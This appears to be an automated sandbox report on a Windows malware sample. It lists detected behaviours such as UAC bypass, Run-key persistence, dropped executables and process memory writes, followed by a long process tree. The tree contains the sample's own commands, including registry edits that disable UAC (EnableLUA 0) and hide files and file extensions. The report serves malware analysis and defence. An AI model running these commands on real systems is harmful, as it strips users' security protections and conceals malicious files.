Analysis Overview
SHA256
2574e9a742b102417c4e2afe4ea95e8e8e2115b64c1bb0e8b230e127a757f6e4
Threat Level: Known bad
The file a4ac9a267d30bbd90e7305ecd29ed4e7.exe was found to be: Known bad.
Malicious Activity Summary
Modifies visibility of file extensions in Explorer
UAC bypass
Loads dropped DLL
Executes dropped EXE
Adds Run key to start application
Checks whether UAC is enabled
Drops file in System32 directory
Program crash
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Modifies registry key
System policy modification
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-07 19:21
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-07 19:21
Reported
2024-01-07 19:24
Platform
win10v2004-20231215-en
Max time kernel
0s
Max time network
150s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\EiYAQYEc\hEIoIMIU.exe | N/A |
| N/A | N/A | C:\ProgramData\waoYUQws\rgQoYAEU.exe | N/A |
| N/A | N/A | C:\ProgramData\ZcAsYkkY\puIwwoYU.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\rgQoYAEU.exe = "C:\\ProgramData\\waoYUQws\\rgQoYAEU.exe" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hEIoIMIU.exe = "C:\\Users\\Admin\\EiYAQYEc\\hEIoIMIU.exe" | C:\Users\Admin\EiYAQYEc\hEIoIMIU.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\rgQoYAEU.exe = "C:\\ProgramData\\waoYUQws\\rgQoYAEU.exe" | C:\ProgramData\waoYUQws\rgQoYAEU.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\rgQoYAEU.exe = "C:\\ProgramData\\waoYUQws\\rgQoYAEU.exe" | C:\ProgramData\ZcAsYkkY\puIwwoYU.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hEIoIMIU.exe = "C:\\Users\\Admin\\EiYAQYEc\\hEIoIMIU.exe" | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\EiYAQYEc | C:\ProgramData\ZcAsYkkY\puIwwoYU.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\EiYAQYEc\hEIoIMIU | C:\ProgramData\ZcAsYkkY\puIwwoYU.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\ProgramData\yGcIsoAM\AAQQYkEk.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\nGUIEwUY\QiUswMgw.exe |
Modifies registry key
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1508 wrote to memory of 4820 | N/A | N/A | C:\Users\Admin\EiYAQYEc\hEIoIMIU.exe |
| PID 1508 wrote to memory of 4820 | N/A | N/A | C:\Users\Admin\EiYAQYEc\hEIoIMIU.exe |
| PID 1508 wrote to memory of 4820 | N/A | N/A | C:\Users\Admin\EiYAQYEc\hEIoIMIU.exe |
| PID 1508 wrote to memory of 1776 | N/A | N/A | C:\ProgramData\waoYUQws\rgQoYAEU.exe |
| PID 1508 wrote to memory of 1776 | N/A | N/A | C:\ProgramData\waoYUQws\rgQoYAEU.exe |
| PID 1508 wrote to memory of 1776 | N/A | N/A | C:\ProgramData\waoYUQws\rgQoYAEU.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
"C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe"
C:\ProgramData\ZcAsYkkY\puIwwoYU.exe
C:\ProgramData\ZcAsYkkY\puIwwoYU.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dIckAgYM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kGYksQcY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fAQAUUIs.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vEgsgIsQ.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nicAccYM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PoEoUMkw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\nGUIEwUY\QiUswMgw.exe
"C:\Users\Admin\nGUIEwUY\QiUswMgw.exe"
C:\ProgramData\yGcIsoAM\AAQQYkEk.exe
C:\ProgramData\yGcIsoAM\AAQQYkEk.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 288
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 264
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3600 -ip 3600
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5000 -ip 5000
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1740 -ip 1740
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wSwsgsMA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hCYkwQQA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HCcoAwcY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xIsEAYYA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xIkMkIwQ.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hUMQIcoA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yIYEwQQA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
